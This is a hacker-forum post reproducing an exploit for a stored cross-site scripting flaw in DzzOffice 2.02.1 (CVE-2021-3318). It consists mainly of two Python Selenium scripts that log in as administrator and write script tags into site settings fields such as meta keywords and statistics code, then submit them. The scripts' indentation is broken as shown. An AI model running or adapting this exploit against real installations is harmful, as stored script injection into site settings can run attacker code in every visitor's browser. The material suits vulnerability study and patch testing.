Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)

 Share


HACK1949

Recommended Posts

# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04/23/2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
import time
import os


#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/user.php?mod=login"

#enter your login username
username="admin@dzzoffice.com"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="loginsubmit"

# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users

# Otvarai da ne vlazam s kasata
browser.get((website_link))

# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

### Exploit
#time.sleep(3)
element_for_natrutvanie="admin_password"
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
browser.get((laina))

### Next level... :)
os.system("python poc_login_1.py")

print("payload is deployed_0...\n")
except Exception:

#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

### os.system

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/admin.php?mod=setting"

#enter your login username
username="admin@dzzoffice.com"

#enter your login password
password="password"


#enter the element for username input field
element_for_username="admin_email"

#enter the element for password input field
element_for_password="admin_password"

#enter the element for submit button
element_for_submit="submit"

# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users

# Otvarai da ne vlazam s kasata
browser.get((website_link))

# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

### Exploit
time.sleep(3)
element_for_natrutvanie="settingsubmit"
laina="http://localhost/dzzoffice/admin.php?mod=setting"
browser.get((laina))

### Inner text...
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")

time.sleep(5)

# Submit exploit
signInButton = browser.find_element_by_name(element_for_natrutvanie)
signInButton.click()

print("payload is deployed_1...\n")
except Exception:

#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...